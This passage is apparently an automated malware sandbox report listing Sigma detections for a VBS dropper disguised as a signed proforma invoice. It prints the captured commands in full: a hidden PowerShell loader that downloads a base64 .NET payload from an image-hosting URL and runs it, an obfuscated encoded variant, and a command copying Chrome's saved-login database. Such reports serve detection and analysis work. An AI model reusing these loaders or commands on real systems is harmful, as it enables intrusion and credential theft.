('wBUgp6qysF58iJA!=yekhtua&21112%08168C3C4F36F6E4=diser?daolnwod/moc.evil.evirdeno//:sptth' , 'desativado' , 'desativado' , 'desativado','MSBuild',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('wBUgp6qysF58iJA!=yekhtua&21112%08168C3C4F36F6E4=d

            System Summary

            barindex
            Sigma detected: Base64 Encoded PowerShell Command Detected
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgT
            Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
            Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('wBUgp6qysF58iJA!=yekhtua&21112%08168C3C4F36F6E4=diser?daolnwod/moc.evil.evirdeno//:sptth' , 'desativado' , 'desativado' , 'desativado','MSBuild',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('wBUgp6qysF58iJA!=yekhtua&21112%08168C3C4F36F6E4=d
            Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgT
            Sigma detected: Suspicious Creation with Colorcpl
            Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\colorcpl.exe, ProcessId: 4584, TargetFilename: C:\Users\user\AppData\Roaming\J4L3O90F
            Sigma detected: WScript or CScript Dropper
            Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Signed Proforma Invoice 3645479_pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Signed Proforma Invoice 3645479_pdf.vbs", CommandLine|base64offset|contains: >, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Signed Proforma Invoice 3645479_pdf.vbs", ProcessId: 6940, ProcessName: wscript.exe
            Sigma detected: Change PowerShell Policies to an Insecure Level
            Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgT
            Sigma detected: Potential Browser Data Stealing
            Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V, CommandLine: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\SysWOW64\colorcpl.exe", ParentImage: C:\Windows\SysWOW64\colorcpl.exe, ParentProcessId: 4584, ParentProcessName: colorcpl.exe, ProcessCommandLine: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V, ProcessId: 1704, ProcessName: cmd.exe
            Sigma detected: Script Initiated Connection
            Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 172.67.187.200, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 6940, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730
            Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
            Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('wBUgp6qysF58iJA!=yekhtua&21112%08168C3C4F36F6E4=diser?daolnwod/moc.evil.evirdeno//:sptth' , 'desativado' , 'desativado' , 'desativado','MSBuild',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('wBUgp6qysF58iJA!=yekhtua&21112%08168C3C4F36F6E4=d
            Sigma detected: Usage Of Web Request Commands And Cmdlets
            Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('wBUgp6qysF58iJA!=yekhtua&21112%08168C3C4F36F6E4=diser?daolnwod/moc.evil.evirdeno//:sptth' , 'desativado' , 'desativado' , 'desativado','MSBuild',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('wBUgp6qysF58iJA!=yekhtua&21112%08168C3C4F36F6E4=d
            Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
            Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Signed Proforma Invoice 3645479_pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Signed Proforma Invoice 3645479_pdf.vbs", CommandLine|base64offset|contains: >, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Signed Proforma Invoice 3645479_pdf.vbs", ProcessId: 6940, ProcessName: wscript.exe
            Sigma detected: Non Interactive PowerShell Process Spawned
